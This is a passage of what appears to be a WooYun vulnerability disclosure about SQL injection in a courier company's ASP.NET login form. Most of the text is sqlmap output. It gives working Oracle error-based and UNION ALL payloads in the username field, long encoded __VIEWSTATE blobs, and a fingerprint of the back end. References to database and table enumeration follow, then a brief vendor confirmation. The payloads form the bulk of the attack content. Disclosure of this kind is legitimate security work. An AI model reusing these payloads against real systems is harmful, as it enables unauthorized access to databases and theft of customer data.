4NDU2YWJjNTdhOTNkMDRkZWI0YTAiPuWbvemZheS4muWKoTwvYT48L2xpPjxsaT4mbmJzcDsmbmJzcDs
mbmJzcDt8Jm5ic3A7Jm5ic3A7Jm5ic3A7PC9saT48bGk PGEgaHJlZj0iamF2YXNjcmlwdDp2b2lkKDA
pIj7lrqLmiLfpobvnn6U8L2E PHVsPjxsaT48YSBocmVmPSIvd2ViZnVuY3Rpb24vd2VicGFnZS5hc3B
4P25pZD01MjEyNjUwMzM3ZjY0ZmM0YTE1OGUwNDU5MWJmZThmZSI 5b r6YCS5Y2V5aGr5YaZ5oyH5by
VPC9hPjxsaT48YSBocmVmPSIvd2ViZnVuY3Rpb24vd2VicGFnZS5hc3B4P25pZD1jNzcwZjE3ZDM2ZTU
0NDFmYmU5ZGYzOWM3YzIzZjJhYSI 56aB6L Q44CB6ZmQ6L Q54mp5ZOBPC9hPjxsaT48YSBocmVmPSI
vd2ViZnVuY3Rpb24vd2VicGFnZS5hc3B4P25pZD1jZDZlZDEwMDk4Y2Y0NmQwOTU3NDU5MmM1MWNmOGE
3OSI 5pyN5Yqh5rWB56iLPC9hPjxsaT48YSBocmVmPSIvd2ViZnVuY3Rpb24vd2VicGFnZS5hc3B4P25
pZD0yYjVkOThjYzcwY2Y0ZDRkOWQ4OTk4ZjE5MjM2NTZiNiI 6LWU5YG/5pa55rOVPC9hPjxsaT48YSB
ocmVmPSIvd2ViZnVuY3Rpb24vd2VicGFnZS5hc3B4P25pZD00ODI4ZTYyZjgzODI0OTI5ODFhYTFhMWI
yYzJjNWFlMCI 6LSn54mp5L d5Lu3PC9hPjwvdWw PC9saT48L2xpPjxsaT4mbmJzcDsmbmJzcDsmbmJ
zcDt8Jm5ic3A7Jm5ic3A7Jm5ic3A7PC9saT48bGk PGEgaHJlZj0iL3dlYmZ1bmN0aW9uL3dlYnBhZ2U
uYXNweD9uaWQ9MzljOTUzY2NhOTcxNDFlMDgzMjlkZTMyYjE5MDM3MzEiPuS/g mUgOa0u WKqDwvYT4
8L2xpPjwvdWw PC90ZD48L3RyPjwvdGFibGU PC90ZD48L3RyPjwvdGFibGU PHRhYmxlIGNlbGxwYWR
kaW5nPTAgY2VsbHNwYWNpbmc9MCB3aWR0aD0iOTglIiAgaWQ9Im15VGFiMF9Db250ZW50MyIgY2xhc3M
9IlRhYkNvbnRlbnREaXYiPjx0cj48dGQgd2lkdGg9MjU1cHg Jm5ic3A7PC90ZD4gPHRkIGFsaWduPWN
lbnRlcj4gPHRhYmxlIGNlbGxwYWRkaW5nPTAgY2VsbHNwYWNpbmc9MD48dHI PHRkPjx1bD48bGk PGE
gaHJlZj0iL3dlYkZ1bmN0aW9uL3dlYnBhZ2VuZXdzbGlzdC5hc3B4P25yaWQ9NjQ2ZmUwODcwZDRkNGF
iYjgxNzM4NWQwYmYwNjEyZWYiPkNBReaWsOmXuzwvYT48L2xpPjxsaT4mbmJzcDsmbmJzcDsmbmJzcDt
8Jm5ic3A7Jm5ic3A7Jm5ic3A7PC9saT48bGk PGEgaHJlZj0iL3dlYkZ1bmN0aW9uL3dlYnBhZ2VuZXd
zbGlzdC5hc3B4P25yaWQ9YzUzMDAwNDZjNTA3NDkzNWI4MTg2Mzc3ZmNmNzJhMTIiPuWbvei1hOWnlOi
mgemXuzwvYT48L2xpPjxsaT4mbmJzcDsmbmJzcDsmbmJzcDt8Jm5ic3A7Jm5ic3A7Jm5ic3A7PC9saT4
8bGk PGEgaHJlZj0iL3dlYkZ1bmN0aW9uL3dlYnBhZ2VuZXdzbGlzdC5hc3B4P25yaWQ9YTg5NWNkZmM
xZDg2NGVlNTkxNWJmZjFiOWUxOGEzMGYiPuacgOaWsOWFrOWRijwvYT48L2xpPjwvdWw PC90ZD48L3R
yPjwvdGFibGU PC90ZD48L3RyPjwvdGFibGU PHRhYmxlIGNlbGxwYWRkaW5nPTAgY2VsbHNwYWNpbmc
9MCB3aWR0aD0iOTglIiAgaWQ9Im15VGFiMF9Db250ZW50NCIgY2xhc3M9IlRhYkNvbnRlbnREaXYiPjx
0cj48dGQ Jm5ic3A7PC90ZD4gPHRkICBhbGlnbj1yaWdodD4gPHRhYmxlIGNlbGxwYWRkaW5nPTAgY2V
sbHNwYWNpbmc9MD48dHI PHRkPjx1bD48bGk PGEgaHJlZj0iL3dlYmZ1bmN0aW9uL3dlYnBhZ2UuYXN
weD9uaWQ9OTliMGNlNTA2ODkzNDM1OWJhMWJlMmNhMTZjYTk5ZmMiPuagoeWbreaLm iBmDwvYT48L2x
pPjxsaT4mbmJzcDsmbmJzcDsmbmJzcDt8Jm5ic3A7Jm5ic3A7Jm5ic3A7PC9saT48bGk PGEgaHJlZj0
iL3dlYmZ1bmN0aW9uL3dlYnBhZ2UuYXNweD9uaWQ9M2UxZTgxOGJmNDg4NDg3YzkzNTYyZTNhZGJkMGM
2ZjkiPuekvuS8muaLm iBmDwvYT48L2xpPjxsaT4mbmJzcDsmbmJzcDsmbmJzcDt8Jm5ic3A7Jm5ic3A
7Jm5ic3A7PC9saT48bGk PGEgaHJlZj0iL3dlYmZ1bmN0aW9uL3dlYnBhZ2UuYXNweD9uaWQ9OTU5MjB
jNTE5M2NkNDY1OThhZDYxMDM1ZWZiMjBkYzIiPue7hOe7h acuuaehDwvYT48L2xpPjwvdWw PC90ZD4
8L3RyPjwvdGFibGU PC90ZD48L3RyPjwvdGFibGU PHRhYmxlIGNlbGxwYWRkaW5nPTAgY2VsbHNwYWN
pbmc9MCB3aWR0aD0iOTglIiAgaWQ9Im15VGFiMF9Db250ZW50NSIgY2xhc3M9IlRhYkNvbnRlbnREaXY
iPjx0cj48dGQ Jm5ic3A7PC90ZD4gPHRkICBhbGlnbj1yaWdodD4gPHRhYmxlIGNlbGxwYWRkaW5nPTA
gY2VsbHNwYWNpbmc9MD48dHI PHRkPjx1bD48bGk PGEgaHJlZj0iL3dlYmZ1bmN0aW9uL3dlYnBhZ2U
uYXNweD9uaWQ9MThlMmI1NGRlOGRkNDQ0Nzg3Yzk3NjZjNDc4YTUzYWEiPuWFrOWPuOeugOS7izwvYT4
8L2xpPjxsaT4mbmJzcDsmbmJzcDsmbmJzcDt8Jm5ic3A7Jm5ic3A7Jm5ic3A7PC9saT48bGk PGEgaHJ
lZj0iL3dlYmZ1bmN0aW9uL3dlYnBhZ2UuYXNweD9uaWQ9OGE0OGRkMzRmYjZlNDY1ZGEzNGY2NDBjMDY
1NWM5MjUiPuiNo iqieWllumhuTwvYT48L2xpPjxsaT4mbmJzcDsmbmJzcDsmbmJzcDt8Jm5ic3A7Jm5
ic3A7Jm5ic3A7PC9saT48bGk PGEgaHJlZj0iL3dlYmZ1bmN0aW9uL3dlYnBhZ2UuYXNweD9uaWQ9NDM
3MTdhMzhkZTJlNGFmNGFkZjRiYzBjMjRmNGM1M2EiPuekvuS8mui0o S7uzwvYT48L2xpPjxsaT4mbmJ
zcDsmbmJzcDsmbmJzcDt8Jm5ic3A7Jm5ic3A7Jm5ic3A7PC9saT48bGk PGEgaHJlZj0iL3dlYmZ1bmN
0aW9uL3RwYyI 6IGM5bel5pGE5b2xPC9hPjwvbGk PC91bD48L3RkPjwvdHI PC90YWJsZT48L3RkPjw
vdHI PC90YWJsZT5kZGT0mAfcvqhDKQI2kzBu9UyObtsaDA==&__VIEWSTATEGENERATOR=AE5782F1&
__EVENTVALIDATION=/wEWBAK i5q8CQKzw6qfBwKitfm4CgKugbOqA1lvp1DFBSSWXxhoONbn0wk7MT
t3&ctl00$Content_Body$Cp_User=admin' AND 1501=(SELECT UPPER(XMLType(CHR(60)||CHR
(58)||CHR(113)||CHR(122)||CHR(101)||CHR(107)||CHR(113)||(SELECT (CASE WHEN (1501
=1501) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(104)||CHR(106)||CHR(115)||CH
R(113)||CHR(62))) FROM DUAL) AND 'txpT'='txpT&ctl00$Content_Body$Cp_Pass=123456&
ctl00$Content_Body$Button1=%E7%99%BB %E5%BD%95
    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: __VIEWSTATE=/wEPDwUKMjEwMDk5MTMwMg9kFgJmD2QWAgIDD2QWBAIBDw8WAh4EVGV
4dAX7CDx0YWJsZSBjZWxscGFkZGluZz0iMCIgY2VsbHNwYWNpbmc9IjAiIGNsYXNzPSJNZW51VGFibGU
iPjx0cj48dGQgYWxpZ249bGVmdCB3aWR0aD0iMTFweCI PGltZyBzcmM9Ii9pbWFnZXMvbWVudV9sZWZ
0LmdpZiIgLz48L3RkPiA8dGQgaWQ9Im1lbnV0ZDAiIGNsYXNzPSJNZW51VGRfbW92ZSIgb25tb3VzZW1
vdmU9Im5UYWJzKHRoaXMsMCkiIHN0eWxlPSJjdXJzb3I6cG9pbnRlciIgb25jbGljaz0iSmF2YXNjcml
wdDpsb2NhdGlvbi5ocmVmPScvRGVmYXVsdC5hc3B4JyI 6aaWIOmhtTwvdGQ PHRkICB3aWR0aD0iMTF
weCI PGltZyBzcmM9Ii9pbWFnZXMvbWVudV9iay5naWYiIC8 PC90ZD48dGQgaWQ9Im1lbnV0ZDEiIGN
sYXNzPSJNZW51VGQiIG9ubW91c2Vtb3ZlPSJuVGFicyh0aGlzLDEpIiBzdHlsZT0iY3Vyc29yOnBvaW5
0ZXIiID7lnKjnur/mlK/mjIE8L3RkPjx0ZCAgd2lkdGg9IjExcHgiPjxpbWcgc3JjPSIvaW1hZ2VzL21
lbnVfYmsuZ2lmIiAvPjwvdGQ PHRkIGlkPSJtZW51dGQyIiBjbGFzcz0iTWVudVRkIiBvbm1vdXNlbW9
2ZT0iblRhYnModGhpcywyKSIgc3R5bGU9ImN1cnNvcjpwb2ludGVyIiA 5Lqn5ZOB5LiO5pyN5YqhPC9
0ZD48dGQgIHdpZHRoPSIxMXB4Ij48aW1nIHNyYz0iL2ltYWdlcy9tZW51X2JrLmdpZiIgLz48L3RkPjx
0ZCBpZD0ibWVudXRkMyIgY2xhc3M9Ik1lbnVUZCIgb25tb3VzZW1vdmU9Im5UYWJzKHRoaXMsMykiIHN
0eWxlPSJjdXJzb3I6cG9pbnRlciIgPuaWsOmXu WKqOaAgTwvdGQ PHRkICB3aWR0aD0iMTFweCI PGl
tZyBzcmM9Ii9pbWFnZXMvbWVudV9iay5naWYiIC8 PC90ZD48dGQgaWQ9Im1lbnV0ZDQiIGNsYXNzPSJ
NZW51VGQiIG9ubW91c2Vtb3ZlPSJuVGFicyh0aGlzLDQpIiBzdHlsZT0iY3Vyc29yOnBvaW50ZXIiID7
kurrmiY3mi5vogZg8L3RkPjx0ZCAgd2lkdGg9IjExcHgiPjxpbWcgc3JjPSIvaW1hZ2VzL21lbnVfYms
uZ2lmIiAvPjwvdGQ PHRkIGlkPSJtZW51dGQ1IiBjbGFzcz0iTWVudVRkIiBvbm1vdXNlbW92ZT0iblR
hYnModGhpcyw1KSIgc3R5bGU9ImN1cnNvcjpwb2ludGVyIiA 6LWw6L bQ0FFPC90ZD48dGQgYWxpZ24
9cmlnaHQgd2lkdGg9IjExcHgiPjxpbWcgc3JjPSIvaW1hZ2VzL21lbnVfcmlnaHQuZ2lmIj48L3RkPjw
vdHI PC90YWJsZT5kZAIDDw8WAh8ABdcoPHRhYmxlIGNlbGxwYWRkaW5nPTAgY2VsbHNwYWNpbmc9MCB
3aWR0aD0iOTglIiAgaWQ9Im15VGFiMF9Db250ZW50MCIgY2xhc3M9IlRhYkNvbnRlbnREaXZTaG93Ij4
8dHI PHRkIHdpZHRoPTMzcHg Jm5ic3A7PC90ZD4gPHRkPiA8dGFibGUgY2VsbHBhZGRpbmc9MCBjZWx
sc3BhY2luZz0wPjx0cj48dGQ PHVsPjwvdWw PC90ZD48L3RyPjwvdGFibGU PC90ZD48L3RyPjwvdGF
ibGU PHRhYmxlIGNlbGxwYWRkaW5nPTAgY2VsbHNwYWNpbmc9MCB3aWR0aD0iOTglIiAgaWQ9Im15VGF
iMF9Db250ZW50MSIgY2xhc3M9IlRhYkNvbnRlbnREaXYiPjx0cj48dGQgd2lkdGg9MTU1cHg Jm5ic3A
7PC90ZD4gPHRkPiA8dGFibGUgY2VsbHBhZGRpbmc9MCBjZWxsc3BhY2luZz0wPjx0cj48dGQ PHVsPjx
saT48YSBocmVmPSIvd2ViRnVuY3Rpb24vRGVsaXZlcnlSYW5nZS9EZWZhdWx0LmFzcHgiPuWPlumAgei
Mg WbtDwvYT48L2xpPjxsaT4mbmJzcDsmbmJzcDsmbmJzcDt8Jm5ic3A7Jm5ic3A7Jm5ic3A7PC9saT4
8bGk PGEgaHJlZj0iL3dlYkZ1bmN0aW9uL0V4cHJlc3NRdWVyeS9EZWZhdWx0LmFzcHgiPuW/q S7tua
fpeivojwvYT48L2xpPjxsaT4mbmJzcDsmbmJzcDsmbmJzcDt8Jm5ic3A7Jm5ic3A7Jm5ic3A7PC9saT4
8bGk PGEgaHJlZj0iL3dlYkZ1bmN0aW9uL0N1c3RvbWVySW5xdWlyaWVzL0RlZmF1bHQuYXNweCI 5aS
n5a6i5oi35p l6K iPC9hPjwvbGk PGxpPiZuYnNwOyZuYnNwOyZuYnNwO3wmbmJzcDsmbmJzcDsmbmJ
zcDs8L2xpPjxsaT48YSBocmVmPSIvd2ViRnVuY3Rpb24vV2ViQ29tcGxhaW50L0RlZmF1bHQuYXNweCI
 5oqV6K J5LiO5bu66K6uPC9hPjwvbGk PGxpPiZuYnNwOyZuYnNwOyZuYnNwO3wmbmJzcDsmbmJzcDs
mbmJzcDs8L2xpPjxsaT48YSBocmVmPSIvd2ViZnVuY3Rpb24vUXNjV2ViL2RlZmF1bHQuYXNweCI 5Y2
P5L2c5bmz5Y wPC9hPjwvbGk PC91bD48L3RkPjwvdHI PC90YWJsZT48L3RkPjwvdHI PC90YWJsZT4
8dGFibGUgY2VsbHBhZGRpbmc9MCBjZWxsc3BhY2luZz0wIHdpZHRoPSI5OCUiICBpZD0ibXlUYWIwX0N
vbnRlbnQyIiBjbGFzcz0iVGFiQ29udGVudERpdiI PHRyPjx0ZD4mbmJzcDs8L3RkPiA8dGQgcm93bmF
wIGFsaWduPWNlbnRlcj4gPHRhYmxlIGNlbGxwYWRkaW5nPTAgY2VsbHNwYWNpbmc9MD48dHI PHRkPjx
1bD48bGk PGEgaHJlZj0iamF2YXNjcmlwdDp2b2lkKDApIj7moIflh4bkuqflk4E8L2E PHVsPjxsaT4
8YSBocmVmPSIvd2ViZnVuY3Rpb24vd2VicGFnZS5hc3B4P25pZD1mOTNmY2ZiNzllM2Q0YzM3YTY5NTk
4ZDAxOTdhNzkzMCI 6ZmQ5pe25pyN5YqhPC9hPjxsaT48YSBocmVmPSIvd2ViZnVuY3Rpb24vd2VicGF
nZS5hc3B4P25pZD0zYjZlOTQ1NDBiZDE0NTRkYjAyNjk5Zjk0ZTFmNGUwNiI 5YiG5pe26YCS6YCBPC9
hPjxsaT48YSBocmVmPSIvd2ViZnVuY3Rpb24vd2VicGFnZS5hc3B4P25pZD1iYjc4NTAyMWJlYzE0NzI
xOTcyODI5ZDY0ZDYxNjAwYSI 5pmu6LSn6L Q6L6TPC9hPjwvdWw PC9saT48L2xpPjxsaT4mbmJzcDs
mbmJzcDsmbmJzcDt8Jm5ic3A7Jm5ic3A7Jm5ic3A7PC9saT48bGk PGEgaHJlZj0iamF2YXNjcmlwdDp
2b2lkKDApIj7lop7lgLzmnI3liqE8L2E PHVsPjxsaT48YSBocmVmPSIvd2ViZnVuY3Rpb24vd2VicGF
nZS5hc3B4P25pZD1lNTI2OWM2YTU2NTk0MGRjYmI1YmE4NmYyNjI4Mjk5NCI 5byA566x6aqM6LSnPC9
hPjxsaT48YSBocmVmPSIvd2ViZnVuY3Rpb24vd2VicGFnZS5hc3B4P25pZD0wY2RiNTU5ZTJjODc0MDV
lOTU1NTQxZTJiZWIzODY1ZCI 562 5Y2V6L U5ZuePC9hPjxsaT48YSBocmVmPSIvd2ViZnVuY3Rpb24
vd2VicGFnZS5hc3B4P25pZD1mMGExNWE0ZTZlMTA0ZGYzYTRmOGY1NDI5NTUwZWIxOCI 5Lul5pen5o2
i5pawPC9hPjxsaT48YSBocmVmPSIvd2ViZnVuY3Rpb24vd2VicGFnZS5hc3B4P25pZD00ZGRhMTAzM2Z
mOWM0YTE3OGYyMGRlMTQ3MjFiNDNmMiI 5L d5Lu35pyN5YqhPC9hPjwvdWw PC9saT48L2xpPjxsaT4
mbmJzcDsmbmJzcDsmbmJzcDt8Jm5ic3A7Jm5ic3A7Jm5ic3A7PC9saT48bGk PGEgaHJlZj0iamF2YXN
jcmlwdDp2b2lkKDApIj7kuKrmgKfmlrnmoYg8L2E PHVsPjxsaT48YSBocmVmPSIvd2ViZnVuY3Rpb24
vd2VicGFnZS5hc3B4P25pZD1iMTJlNDY3ZmRjOTQ0OWZlODIwNTcyZmI4OTVhOTRlMiI 5aSH5Lu254m
p5rWB6Kej5Yaz5pa55qGIPC9hPjxsaT48YSBocmVmPSIvd2ViZnVuY3Rpb24vd2VicGFnZS5hc3B4P25
pZD02ZDYwZjJiNzgyZTA0NDc2ODcwNWMyNjk2OWRlNmQxNyI 57u85ZCI54mp5rWB6Kej5Yaz5pa55qG
IPC9hPjwvdWw PC9saT48L2xpPjxsaT4mbmJzcDsmbmJzcDsmbmJzcDt8Jm5ic3A7Jm5ic3A7Jm5ic3A
7PC9saT48bGk PGEgaHJlZj0iL3dlYmZ1bmN0aW9uL3dlYnBhZ2UuYXNweD9uaWQ9MDllNmVjZTFmODY
4NDU2YWJjNTdhOTNkMDRkZWI0YTAiPuWbvemZheS4muWKoTwvYT48L2xpPjxsaT4mbmJzcDsmbmJzcDs
mbmJzcDt8Jm5ic3A7Jm5ic3A7Jm5ic3A7PC9saT48bGk PGEgaHJlZj0iamF2YXNjcmlwdDp2b2lkKDA
pIj7lrqLmiLfpobvnn6U8L2E PHVsPjxsaT48YSBocmVmPSIvd2ViZnVuY3Rpb24vd2VicGFnZS5hc3B
4P25pZD01MjEyNjUwMzM3ZjY0ZmM0YTE1OGUwNDU5MWJmZThmZSI 5b r6YCS5Y2V5aGr5YaZ5oyH5by
VPC9hPjxsaT48YSBocmVmPSIvd2ViZnVuY3Rpb24vd2VicGFnZS5hc3B4P25pZD1jNzcwZjE3ZDM2ZTU
0NDFmYmU5ZGYzOWM3YzIzZjJhYSI 56aB6L Q44CB6ZmQ6L Q54mp5ZOBPC9hPjxsaT48YSBocmVmPSI
vd2ViZnVuY3Rpb24vd2VicGFnZS5hc3B4P25pZD1jZDZlZDEwMDk4Y2Y0NmQwOTU3NDU5MmM1MWNmOGE
3OSI 5pyN5Yqh5rWB56iLPC9hPjxsaT48YSBocmVmPSIvd2ViZnVuY3Rpb24vd2VicGFnZS5hc3B4P25
pZD0yYjVkOThjYzcwY2Y0ZDRkOWQ4OTk4ZjE5MjM2NTZiNiI 6LWU5YG/5pa55rOVPC9hPjxsaT48YSB
ocmVmPSIvd2ViZnVuY3Rpb24vd2VicGFnZS5hc3B4P25pZD00ODI4ZTYyZjgzODI0OTI5ODFhYTFhMWI
yYzJjNWFlMCI 6LSn54mp5L d5Lu3PC9hPjwvdWw PC9saT48L2xpPjxsaT4mbmJzcDsmbmJzcDsmbmJ
zcDt8Jm5ic3A7Jm5ic3A7Jm5ic3A7PC9saT48bGk PGEgaHJlZj0iL3dlYmZ1bmN0aW9uL3dlYnBhZ2U
uYXNweD9uaWQ9MzljOTUzY2NhOTcxNDFlMDgzMjlkZTMyYjE5MDM3MzEiPuS/g mUgOa0u WKqDwvYT4
8L2xpPjwvdWw PC90ZD48L3RyPjwvdGFibGU PC90ZD48L3RyPjwvdGFibGU PHRhYmxlIGNlbGxwYWR
kaW5nPTAgY2VsbHNwYWNpbmc9MCB3aWR0aD0iOTglIiAgaWQ9Im15VGFiMF9Db250ZW50MyIgY2xhc3M
9IlRhYkNvbnRlbnREaXYiPjx0cj48dGQgd2lkdGg9MjU1cHg Jm5ic3A7PC90ZD4gPHRkIGFsaWduPWN
lbnRlcj4gPHRhYmxlIGNlbGxwYWRkaW5nPTAgY2VsbHNwYWNpbmc9MD48dHI PHRkPjx1bD48bGk PGE
gaHJlZj0iL3dlYkZ1bmN0aW9uL3dlYnBhZ2VuZXdzbGlzdC5hc3B4P25yaWQ9NjQ2ZmUwODcwZDRkNGF
iYjgxNzM4NWQwYmYwNjEyZWYiPkNBReaWsOmXuzwvYT48L2xpPjxsaT4mbmJzcDsmbmJzcDsmbmJzcDt
8Jm5ic3A7Jm5ic3A7Jm5ic3A7PC9saT48bGk PGEgaHJlZj0iL3dlYkZ1bmN0aW9uL3dlYnBhZ2VuZXd
zbGlzdC5hc3B4P25yaWQ9YzUzMDAwNDZjNTA3NDkzNWI4MTg2Mzc3ZmNmNzJhMTIiPuWbvei1hOWnlOi
mgemXuzwvYT48L2xpPjxsaT4mbmJzcDsmbmJzcDsmbmJzcDt8Jm5ic3A7Jm5ic3A7Jm5ic3A7PC9saT4
8bGk PGEgaHJlZj0iL3dlYkZ1bmN0aW9uL3dlYnBhZ2VuZXdzbGlzdC5hc3B4P25yaWQ9YTg5NWNkZmM
xZDg2NGVlNTkxNWJmZjFiOWUxOGEzMGYiPuacgOaWsOWFrOWRijwvYT48L2xpPjwvdWw PC90ZD48L3R
yPjwvdGFibGU PC90ZD48L3RyPjwvdGFibGU PHRhYmxlIGNlbGxwYWRkaW5nPTAgY2VsbHNwYWNpbmc
9MCB3aWR0aD0iOTglIiAgaWQ9Im15VGFiMF9Db250ZW50NCIgY2xhc3M9IlRhYkNvbnRlbnREaXYiPjx
0cj48dGQ Jm5ic3A7PC90ZD4gPHRkICBhbGlnbj1yaWdodD4gPHRhYmxlIGNlbGxwYWRkaW5nPTAgY2V
sbHNwYWNpbmc9MD48dHI PHRkPjx1bD48bGk PGEgaHJlZj0iL3dlYmZ1bmN0aW9uL3dlYnBhZ2UuYXN
weD9uaWQ9OTliMGNlNTA2ODkzNDM1OWJhMWJlMmNhMTZjYTk5ZmMiPuagoeWbreaLm iBmDwvYT48L2x
pPjxsaT4mbmJzcDsmbmJzcDsmbmJzcDt8Jm5ic3A7Jm5ic3A7Jm5ic3A7PC9saT48bGk PGEgaHJlZj0
iL3dlYmZ1bmN0aW9uL3dlYnBhZ2UuYXNweD9uaWQ9M2UxZTgxOGJmNDg4NDg3YzkzNTYyZTNhZGJkMGM
2ZjkiPuekvuS8muaLm iBmDwvYT48L2xpPjxsaT4mbmJzcDsmbmJzcDsmbmJzcDt8Jm5ic3A7Jm5ic3A
7Jm5ic3A7PC9saT48bGk PGEgaHJlZj0iL3dlYmZ1bmN0aW9uL3dlYnBhZ2UuYXNweD9uaWQ9OTU5MjB
jNTE5M2NkNDY1OThhZDYxMDM1ZWZiMjBkYzIiPue7hOe7h acuuaehDwvYT48L2xpPjwvdWw PC90ZD4
8L3RyPjwvdGFibGU PC90ZD48L3RyPjwvdGFibGU PHRhYmxlIGNlbGxwYWRkaW5nPTAgY2VsbHNwYWN
pbmc9MCB3aWR0aD0iOTglIiAgaWQ9Im15VGFiMF9Db250ZW50NSIgY2xhc3M9IlRhYkNvbnRlbnREaXY
iPjx0cj48dGQ Jm5ic3A7PC90ZD4gPHRkICBhbGlnbj1yaWdodD4gPHRhYmxlIGNlbGxwYWRkaW5nPTA
gY2VsbHNwYWNpbmc9MD48dHI PHRkPjx1bD48bGk PGEgaHJlZj0iL3dlYmZ1bmN0aW9uL3dlYnBhZ2U
uYXNweD9uaWQ9MThlMmI1NGRlOGRkNDQ0Nzg3Yzk3NjZjNDc4YTUzYWEiPuWFrOWPuOeugOS7izwvYT4
8L2xpPjxsaT4mbmJzcDsmbmJzcDsmbmJzcDt8Jm5ic3A7Jm5ic3A7Jm5ic3A7PC9saT48bGk PGEgaHJ
lZj0iL3dlYmZ1bmN0aW9uL3dlYnBhZ2UuYXNweD9uaWQ9OGE0OGRkMzRmYjZlNDY1ZGEzNGY2NDBjMDY
1NWM5MjUiPuiNo iqieWllumhuTwvYT48L2xpPjxsaT4mbmJzcDsmbmJzcDsmbmJzcDt8Jm5ic3A7Jm5
ic3A7Jm5ic3A7PC9saT48bGk PGEgaHJlZj0iL3dlYmZ1bmN0aW9uL3dlYnBhZ2UuYXNweD9uaWQ9NDM
3MTdhMzhkZTJlNGFmNGFkZjRiYzBjMjRmNGM1M2EiPuekvuS8mui0o S7uzwvYT48L2xpPjxsaT4mbmJ
zcDsmbmJzcDsmbmJzcDt8Jm5ic3A7Jm5ic3A7Jm5ic3A7PC9saT48bGk PGEgaHJlZj0iL3dlYmZ1bmN
0aW9uL3RwYyI 6IGM5bel5pGE5b2xPC9hPjwvbGk PC91bD48L3RkPjwvdHI PC90YWJsZT48L3RkPjw
vdHI PC90YWJsZT5kZGT0mAfcvqhDKQI2kzBu9UyObtsaDA==&__VIEWSTATEGENERATOR=AE5782F1&
__EVENTVALIDATION=/wEWBAK i5q8CQKzw6qfBwKitfm4CgKugbOqA1lvp1DFBSSWXxhoONbn0wk7MT
t3&ctl00$Content_Body$Cp_User=admin' UNION ALL SELECT CHR(113)||CHR(122)||CHR(10
1)||CHR(107)||CHR(113)||CHR(65)||CHR(73)||CHR(102)||CHR(120)||CHR(108)||CHR(117)
||CHR(117)||CHR(76)||CHR(112)||CHR(114)||CHR(113)||CHR(104)||CHR(106)||CHR(115)|
|CHR(113) FROM DUAL-- &ctl00$Content_Body$Cp_Pass=123456&ctl00$Content_Body$Butt
on1=%E7%99%BB %E5%BD%95
---
[19:03:36] [WARNING] changes made by tampering scripts are not included in shown
 payload content(s)
[19:03:36] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Oracle


==============================================

1.jpg


2.jpg


3.jpg


--current-db --current-user.jpg


--dbs.jpg


--tables -D CAE.jpg


--count -D ACE.jpg


不继续深入了!~~~

漏洞证明:

--dbs.jpg


--tables -D CAE.jpg


--count -D ACE.jpg

修复方案:

过滤修复
你们比我懂得多。

版权声明:转载请注明来源 Ch4r0n@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-03-13 21:42

厂商回复:

感谢对快递公司的支持!

最新状态:

暂无